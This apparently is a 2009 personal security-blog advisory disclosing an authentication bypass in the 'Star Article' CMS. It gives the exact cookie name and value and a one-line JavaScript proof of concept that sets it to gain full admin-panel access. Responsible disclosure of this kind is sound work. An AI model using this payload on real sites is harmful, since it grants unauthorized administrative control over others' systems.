Logo

Nothing like 127.0.0.1

Star Article Vulnerability

March 6th, 2009 in Security

Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Leads to full administration rights on the CMS admin panel via insecure cookie handling.

Name – admin_user
Content – admin
Path – /

Proof of Concept:

javascript:document.cookie=”admin_user=admin; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

← PHP SiteLock Vulnerability
domRecon Tool →

Leave a Reply

  • Menu

    • Home
    • Security Advisories
    • Projects
    • Scripts
    • Docs
  • Tools

    • domRecon
  • Categories

    • Linux (3)
    • Networking (1)
    • Programming (1)
    • Security (5)

Jayscott.co.uk © 2010
Process in 29 queries. 0.248 seconds.